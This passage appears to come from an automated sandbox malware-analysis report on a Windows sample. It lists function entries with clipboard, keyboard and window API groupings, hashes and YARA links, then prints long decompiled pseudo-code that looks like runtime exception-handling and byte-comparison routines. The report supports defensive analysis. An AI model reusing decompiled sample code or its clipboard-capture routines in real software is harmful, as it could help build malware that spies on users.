                                              • CatchIt.LIBVCRUNTIME ref: 00B27D00
                                              • _UnwindNestedFrames.LIBCMT ref: 00B27E01
                                              • CallUnexpected.LIBVCRUNTIME ref: 00B27E1C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 4119006552-393685449
                                              • Opcode ID: ebb400a31adb7003bdb5150fba62a52f837cabdb15d561c697f14c6e981a22cd
                                              • Instruction ID: 97b43137f7e301639c4cd33782b004d2b64bf15b0f3ea7417e2308f7a829b332
                                              • Opcode Fuzzy Hash: ebb400a31adb7003bdb5150fba62a52f837cabdb15d561c697f14c6e981a22cd
                                              • Instruction Fuzzy Hash: 76B1AD71844229DFCF15DFA4E8808AEBBF5FF18310F1045EAE8086B212DB31DA51CB99
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1AA00 Relevance: 12.2, APIs: 8, Instructions: 181clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ClipboardGlobal$AllocEmptyLockOpen
                                              • String ID:
                                              • API String ID: 3590494090-0
                                              • Opcode ID: 388e12dc2a367433de6c31a46f195d493a807d502f81e8c979c13e683df7f7cc
                                              • Instruction ID: 148d87ec92aee4a9ab012c5760a78b4c8e77ab779347e1a1a60932886ffa06b6
                                              • Opcode Fuzzy Hash: 388e12dc2a367433de6c31a46f195d493a807d502f81e8c979c13e683df7f7cc
                                              • Instruction Fuzzy Hash: AA81E274A042199FCB04DFA8C588AEDBBF0FF08315F1484A9E889EB351E734E981CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1A250 Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CaretFocusInvertRect$HideReleaseShow
                                              • String ID:
                                              • API String ID: 1353628544-0
                                              • Opcode ID: 01fa9d307017d2deb0d78e0cc3963e8147539135a47bc78bc5908b1c9a77ec9f
                                              • Instruction ID: b2d7c61ac96245a3a10b26f6c3230080128124e68e93ba239460d6edf08e2173
                                              • Opcode Fuzzy Hash: 01fa9d307017d2deb0d78e0cc3963e8147539135a47bc78bc5908b1c9a77ec9f
                                              • Instruction Fuzzy Hash: FF619274A00209DFCB04DF68D188AAEBBF5FF08311F5184A9E8499B351E735ED85CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1ACA0 Relevance: 12.1, APIs: 8, Instructions: 98clipboardkeyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ClipboardGlobal$CloseDataLockOpenScanSizeUnlockVirtual
                                              • String ID:
                                              • API String ID: 1615112705-0
                                              • Opcode ID: 6d6de88af16d0c0ec8bac536dccc27cb8c7b65cb9f368fd13322467ccdf4960e
                                              • Instruction ID: 4cd068ca660278c9a0c3206e0b6c186b534b1bc88c39ca321e366e83c1ffa83a
                                              • Opcode Fuzzy Hash: 6d6de88af16d0c0ec8bac536dccc27cb8c7b65cb9f368fd13322467ccdf4960e
                                              • Instruction Fuzzy Hash: 0141D4B5904218EFDB00EFA8D5896ADBBF0FF04304F108969E885A7350EB75A594CB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B12980 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CreateEvent
                                              • String ID:
                                              • API String ID: 2692171526-0
                                              • Opcode ID: 69d9af216d6dcc409a4ecc076f062cf83dbb5dccf0f97b01d90bb490ca8c9559
                                              • Instruction ID: d5684fcfef72fb372939385594a581dd5a49520700666b437935cc04b5fb81ee
                                              • Opcode Fuzzy Hash: 69d9af216d6dcc409a4ecc076f062cf83dbb5dccf0f97b01d90bb490ca8c9559
                                              • Instruction Fuzzy Hash: 4891C6B0908205DFDB04DFA9D4887EEBBF0FB44304F50886AE8559B390D7799599CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1DED0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E00B1DED0(void* __ebx, void* __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __edi;
				void* __esi;
				signed int _t1005;
				signed int _t1012;
				intOrPtr _t1013;
				void* _t1014;
				signed char* _t1015;
				intOrPtr _t1017;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1025;
				signed int _t1028;
				signed int _t1032;
				signed char _t1049;
				signed char _t1052;
				signed char _t1053;
				signed char _t1054;
				signed char _t1055;
				signed char _t1056;
				signed int _t1245;
				intOrPtr* _t1249;
				intOrPtr _t1250;
				void* _t1252;
				signed int _t1256;
				char _t1258;
				signed int _t1262;
				signed int _t1263;
				signed int _t1270;
				signed char* _t1336;
				signed char* _t1337;
				signed char* _t1338;
				signed char* _t1339;
				signed char* _t1340;
				void* _t1341;
				intOrPtr _t1342;
				signed int _t1344;
				intOrPtr _t1347;
				signed char* _t1350;
				signed char* _t1351;
				signed char* _t1352;
				signed char* _t1353;
				signed char* _t1354;
				signed int _t1355;
				void* _t1359;
				void* _t1360;
				void* _t1367;

				_t1333 = __edx;
				_t1249 = _a4;
				_push(_t1341);
				_v5 = 0;
				_v16 = 1;
				 *_t1249 = E00B2AEA1(__ecx,  *_t1249);
				_t1250 = _a8;
				_t6 = _t1250 + 0x10; // 0x11
				_t1347 = _t6;
				_push(_t1347);
				_v20 = _t1347;
				_v12 =  *(_t1250 + 8) ^  *0xb34050;
				E00B1DE90(_t1250, __edx, _t1341, _t1347,  *(_t1250 + 8) ^  *0xb34050);
				E00B220D7(_a12);
				_t1005 = _a4;
				_t1360 = _t1359 + 0x10;
				_t1342 =  *((intOrPtr*)(_t1250 + 0xc));
				if(( *(_t1005 + 4) & 0x00000066) != 0) {
					__eflags = _t1342 - 0xfffffffe;
					if(_t1342 != 0xfffffffe) {
						_t1333 = 0xfffffffe;
						E00B220C0(_t1250, 0xfffffffe, _t1347, 0xb34050);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t1005;
					_v28 = _a12;
					 *((intOrPtr*)(_t1250 - 4)) =  &_v32;
					if(_t1342 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t1256 = _v12;
							_t1012 = _t1342 + (_t1342 + 2) * 2;
							_t1250 =  *((intOrPtr*)(_t1256 + _t1012 * 4));
							_t1013 = _t1256 + _t1012 * 4;
							_t1257 =  *((intOrPtr*)(_t1013 + 4));
							_v24 = _t1013;
							if( *((intOrPtr*)(_t1013 + 4)) == 0) {
								_t1258 = _v5;
								goto L7;
							} else {
								_t1333 = _t1347;
								_t1014 = E00B22060(_t1257, _t1347);
								_t1258 = 1;
								_v5 = 1;
								_t1367 = _t1014;
								if(_t1367 < 0) {
									_v16 = 0;
									L13:
									_push(_t1347);
									E00B1DE90(_t1250, _t1333, _t1342, _t1347, _v12);
									goto L14;
								} else {
									if(_t1367 > 0) {
										_t1015 = _a4;
										__eflags =  *_t1015 - 0xe06d7363;
										if( *_t1015 == 0xe06d7363) {
											__eflags =  *0xb2c628;
											if(__eflags != 0) {
												_t1245 = E00B21EB0(__eflags, 0xb2c628);
												_t1360 = _t1360 + 4;
												__eflags = _t1245;
												if(_t1245 != 0) {
													_t1355 =  *0xb2c628; // 0xb1dc55
													 *0xb37000(_a4, 1);
													 *_t1355();
													_t1347 = _v20;
													_t1360 = _t1360 + 8;
												}
												_t1015 = _a4;
											}
										}
										_t1334 = _t1015;
										E00B220A0(_t1015, _a8, _t1015);
										_t1017 = _a8;
										__eflags =  *((intOrPtr*)(_t1017 + 0xc)) - _t1342;
										if( *((intOrPtr*)(_t1017 + 0xc)) != _t1342) {
											_t1334 = _t1342;
											E00B220C0(_t1017, _t1342, _t1347, 0xb34050);
											_t1017 = _a8;
										}
										_push(_t1347);
										 *((intOrPtr*)(_t1017 + 0xc)) = _t1250;
										E00B1DE90(_t1250, _t1334, _t1342, _t1347, _v12);
										E00B22080();
										asm("int3");
										_push(_t1347);
										_push(_t1342);
										_t1344 = _v32;
										_t1020 = _t1344;
										__eflags = _t1020;
										if(_t1020 == 0) {
											_t1021 = 0;
											__eflags = 0;
										} else {
											_t1022 = _t1020 - 1;
											__eflags = _t1022;
											if(_t1022 == 0) {
												_t1262 =  *_v0 & 0x000000ff;
												_t1025 =  *_a4 & 0x000000ff;
												goto L511;
											} else {
												_t1028 = _t1022 - 1;
												__eflags = _t1028;
												if(_t1028 == 0) {
													_t1336 = _v0;
													_t1350 = _a4;
													_t1263 = ( *_t1336 & 0x000000ff) - ( *_t1350 & 0x000000ff);
													__eflags = _t1263;
													if(_t1263 != 0) {
														__eflags = _t1263;
														_t993 = _t1263 > 0;
														__eflags = _t993;
														_t1263 = (0 | _t993) * 2 - 1;
													}
													__eflags = _t1263;
													if(__eflags != 0) {
														goto L513;
													} else {
														_t1262 = _t1336[1] & 0x000000ff;
														_t1025 = _t1350[1] & 0x000000ff;
														goto L511;
													}
													goto L529;
												} else {
													_t1032 = _t1028 - 1;
													__eflags = _t1032;
													if(_t1032 == 0) {
														_t1337 = _v0;
														_t1351 = _a4;
														_t1263 = ( *_t1337 & 0x000000ff) - ( *_t1351 & 0x000000ff);
														__eflags = _t1263;
														if(_t1263 != 0) {
															__eflags = _t1263;
															_t979 = _t1263 > 0;
															__eflags = _t979;
															_t1263 = (0 | _t979) * 2 - 1;
														}
														__eflags = _t1263;
														if(_t1263 != 0) {
															goto L513;
														} else {
															_t1263 = (_t1337[1] & 0x000000ff) - (_t1351[1] & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t985 = _t1263 > 0;
																__eflags = _t985;
																_t1263 = (0 | _t985) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 != 0) {
																goto L513;
															} else {
																_t1262 = _t1337[2] & 0x000000ff;
																_t1025 = _t1351[2] & 0x000000ff;
																goto L511;
															}
														}
														goto L529;
													} else {
														__eflags = _t1032 == 1;
														if(_t1032 == 1) {
															_t1338 = _v0;
															_t1352 = _a4;
															_t1263 = ( *_t1338 & 0x000000ff) - ( *_t1352 & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t955 = _t1263 > 0;
																__eflags = _t955;
																_t1263 = (0 | _t955) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 == 0) {
																_t1263 = (_t1338[1] & 0x000000ff) - (_t1352[1] & 0x000000ff);
																__eflags = _t1263;
																if(_t1263 != 0) {
																	__eflags = _t1263;
																	_t961 = _t1263 > 0;
																	__eflags = _t961;
																	_t1263 = (0 | _t961) * 2 - 1;
																}
																__eflags = _t1263;
																if(_t1263 == 0) {
																	_t1263 = (_t1338[2] & 0x000000ff) - (_t1352[2] & 0x000000ff);
																	__eflags = _t1263;
																	if(_t1263 != 0) {
																		__eflags = _t1263;
																		_t967 = _t1263 > 0;
																		__eflags = _t967;
																		_t1263 = (0 | _t967) * 2 - 1;
																	}
																	__eflags = _t1263;
																	if(_t1263 == 0) {
																		_t1262 = _t1338[3] & 0x000000ff;
																		_t1025 = _t1352[3] & 0x000000ff;
																		L511:
																		_t1263 = _t1262 - _t1025;
																		__eflags = _t1263;
																		if(_t1263 != 0) {
																			__eflags = _t1263;
																			_t973 = _t1263 > 0;
																			__eflags = _t973;
																			_t1263 = (0 | _t973) * 2 - 1;
																		}
																	}
																}
															}
															L513:
															_t1021 = _t1263;
														} else {
															_t1339 = _a4;
															_t1353 = _v0;
															_push(_t1250);
															_t1252 = 0x20;
															while(1) {
																__eflags = _t1344 - _t1252;
																if(_t1344 < _t1252) {
																	break;
																}
																_t1049 =  *_t1353;
																__eflags = _t1049 -  *_t1339;
																if(_t1049 ==  *_t1339) {
																	L42:
																	__eflags = _t1353[4] - _t1339[4];
																	if(_t1353[4] == _t1339[4]) {
																		L55:
																		__eflags = _t1353[8] - _t1339[8];
																		if(_t1353[8] == _t1339[8]) {
																			L68:
																			_t1052 = _t1353[0xc];
																			__eflags = _t1052 - _t1339[0xc];
																			if(_t1052 == _t1339[0xc]) {
																				L81:
																				_t1053 = _t1353[0x10];
																				__eflags = _t1053 - _t1339[0x10];
																				if(_t1053 == _t1339[0x10]) {
																					L94:
																					_t1054 = _t1353[0x14];
																					__eflags = _t1054 - _t1339[0x14];
																					if(_t1054 == _t1339[0x14]) {
																						L107:
																						_t1055 = _t1353[0x18];
																						__eflags = _t1055 - _t1339[0x18];
																						if(_t1055 == _t1339[0x18]) {
																							L120:
																							_t1056 = _t1353[0x1c];
																							__eflags = _t1056 - _t1339[0x1c];
																							if(_t1056 == _t1339[0x1c]) {
																								L133:
																								_t1353 =  &(_t1353[_t1252]);
																								_t1339 =  &(_t1339[_t1252]);
																								_t1344 = _t1344 - _t1252;
																								__eflags = _t1344;
																								continue;
																							} else {
																								_t1270 = (_t1056 & 0x000000ff) - (_t1339[0x1c] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t228 = _t1270 > 0;
																									__eflags = _t228;
																									_t1270 = (0 | _t228) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1d] & 0x000000ff) - (_t1339[0x1d] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t234 = _t1270 > 0;
																										__eflags = _t234;
																										_t1270 = (0 | _t234) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1e] & 0x000000ff) - (_t1339[0x1e] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t240 = _t1270 > 0;
																											__eflags = _t240;
																											_t1270 = (0 | _t240) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											_t1270 = (_t1353[0x1f] & 0x000000ff) - (_t1339[0x1f] & 0x000000ff);
																											__eflags = _t1270;
																											if(_t1270 != 0) {
																												__eflags = _t1270;
																												_t246 = _t1270 > 0;
																												__eflags = _t246;
																												_t1270 = (0 | _t246) * 2 - 1;
																											}
																											__eflags = _t1270;
																											if(_t1270 == 0) {
																												goto L133;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t1270 = (_t1055 & 0x000000ff) - (_t1339[0x18] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t203 = _t1270 > 0;
																								__eflags = _t203;
																								_t1270 = (0 | _t203) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x19] & 0x000000ff) - (_t1339[0x19] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t209 = _t1270 > 0;
																									__eflags = _t209;
																									_t1270 = (0 | _t209) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1a] & 0x000000ff) - (_t1339[0x1a] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t215 = _t1270 > 0;
																										__eflags = _t215;
																										_t1270 = (0 | _t215) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1b] & 0x000000ff) - (_t1339[0x1b] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t221 = _t1270 > 0;
																											__eflags = _t221;
																											_t1270 = (0 | _t221) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											goto L120;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t1270 = (_t1054 & 0x000000ff) - (_t1339[0x14] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t178 = _t1270 > 0;
																							__eflags = _t178;
																							_t1270 = (0 | _t178) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x15] & 0x000000ff) - (_t1339[0x15] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t184 = _t1270 > 0;
																								__eflags = _t184;
																								_t1270 = (0 | _t184) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x16] & 0x000000ff) - (_t1339[0x16] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t190 = _t1270 > 0;
																									__eflags = _t190;
																									_t1270 = (0 | _t190) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x17] & 0x000000ff) - (_t1339[0x17] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t196 = _t1270 > 0;
																										__eflags = _t196;
																										_t1270 = (0 | _t196) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										goto L107;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t1270 = (_t1053 & 0x000000ff) - (_t1339[0x10] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t153 = _t1270 > 0;
																						__eflags = _t153;
																						_t1270 = (0 | _t153) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0x11] & 0x000000ff) - (_t1339[0x11] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t159 = _t1270 > 0;
																							__eflags = _t159;
																							_t1270 = (0 | _t159) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x12] & 0x000000ff) - (_t1339[0x12] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t165 = _t1270 > 0;
																								__eflags = _t165;
																								_t1270 = (0 | _t165) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x13] & 0x000000ff) - (_t1339[0x13] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t171 = _t1270 > 0;
																									__eflags = _t171;
																									_t1270 = (0 | _t171) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									goto L94;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				_t1270 = (_t1052 & 0x000000ff) - (_t1339[0xc] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t128 = _t1270 > 0;
																					__eflags = _t128;
																					_t1270 = (0 | _t128) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xd] & 0x000000ff) - (_t1339[0xd] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t134 = _t1270 > 0;
																						__eflags = _t134;
																						_t1270 = (0 | _t134) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xe] & 0x000000ff) - (_t1339[0xe] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t140 = _t1270 > 0;
																							__eflags = _t140;
																							_t1270 = (0 | _t140) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0xf] & 0x000000ff) - (_t1339[0xf] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t146 = _t1270 > 0;
																								__eflags = _t146;
																								_t1270 = (0 | _t146) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								goto L81;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t1270 = (_t1353[8] & 0x000000ff) - (_t1339[8] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t103 = _t1270 > 0;
																				__eflags = _t103;
																				_t1270 = (0 | _t103) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[9] & 0x000000ff) - (_t1339[9] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t109 = _t1270 > 0;
																					__eflags = _t109;
																					_t1270 = (0 | _t109) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xa] & 0x000000ff) - (_t1339[0xa] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t115 = _t1270 > 0;
																						__eflags = _t115;
																						_t1270 = (0 | _t115) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xb] & 0x000000ff) - (_t1339[0xb] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t121 = _t1270 > 0;
																							__eflags = _t121;
																							_t1270 = (0 | _t121) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							goto L68;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t1270 = (_t1353[4] & 0x000000ff) - (_t1339[4] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t77 = _t1270 > 0;
																			__eflags = _t77;
																			_t1270 = (0 | _t77) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[5] & 0x000000ff) - (_t1339[5] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t83 = _t1270 > 0;
																				__eflags = _t83;
																				_t1270 = (0 | _t83) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[6] & 0x000000ff) - (_t1339[6] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t89 = _t1270 > 0;
																					__eflags = _t89;
																					_t1270 = (0 | _t89) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[7] & 0x000000ff) - (_t1339[7] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t95 = _t1270 > 0;
																						__eflags = _t95;
																						_t1270 = (0 | _t95) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L55;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t1270 = (_t1049 & 0x000000ff) - ( *_t1339 & 0x000000ff);
																	__eflags = _t1270;
																	if(_t1270 != 0) {
																		__eflags = _t1270;
																		_t51 = _t1270 > 0;
																		__eflags = _t51;
																		_t1270 = (0 | _t51) * 2 - 1;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		_t1270 = (_t1353[1] & 0x000000ff) - (_t1339[1] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t57 = _t1270 > 0;
																			__eflags = _t57;
																			_t1270 = (0 | _t57) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[2] & 0x000000ff) - (_t1339[2] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t63 = _t1270 > 0;
																				__eflags = _t63;
																				_t1270 = (0 | _t63) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[3] & 0x000000ff) - (_t1339[3] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t69 = _t1270 > 0;
																					__eflags = _t69;
																					_t1270 = (0 | _t69) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					goto L42;
																				}
																			}
																		}
																	}
																}
																L228:
																_t1021 = _t1270;
																goto L528;
															}
															_t1354 =  &(_t1353[_t1344]);
															_t1340 =  &(_t1339[_t1344]);
															switch( *((intOrPtr*)(_t1344 * 4 +  &M00B1F62A))) {
																case 0:
																	L227:
																	_t1270 = 0;
																	__eflags = 0;
																	goto L228;
																case 1:
																	L320:
																	__eax =  *(__edx - 1) & 0x000000ff;
																	__ecx =  *(__esi - 1) & 0x000000ff;
																	__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		__eax = 0 | __ecx > 0x00000000;
																		__ecx = (__ecx > 0) * 2 - 1;
																	}
																	goto L228;
																case 2:
																	L413:
																	__eflags =  *(__esi - 2) -  *(__edx - 2);
																	if( *(__esi - 2) ==  *(__edx - 2)) {
																		goto L227;
																	} else {
																		goto L317;
																	}
																	goto L529;
																case 3:
																	L314:
																	__eax =  *(__edx - 3) & 0x000000ff;
																	__ecx =  *(__esi - 3) & 0x000000ff;
																	__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		_t594 = __ecx > 0;
																		__eflags = _t594;
																		__eax = 0 | _t594;
																		__ecx = _t594 * 2 - 1;
																	}
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		goto L228;
																	} else {
																		L317:
																		__eax =  *(__edx - 2) & 0x000000ff;
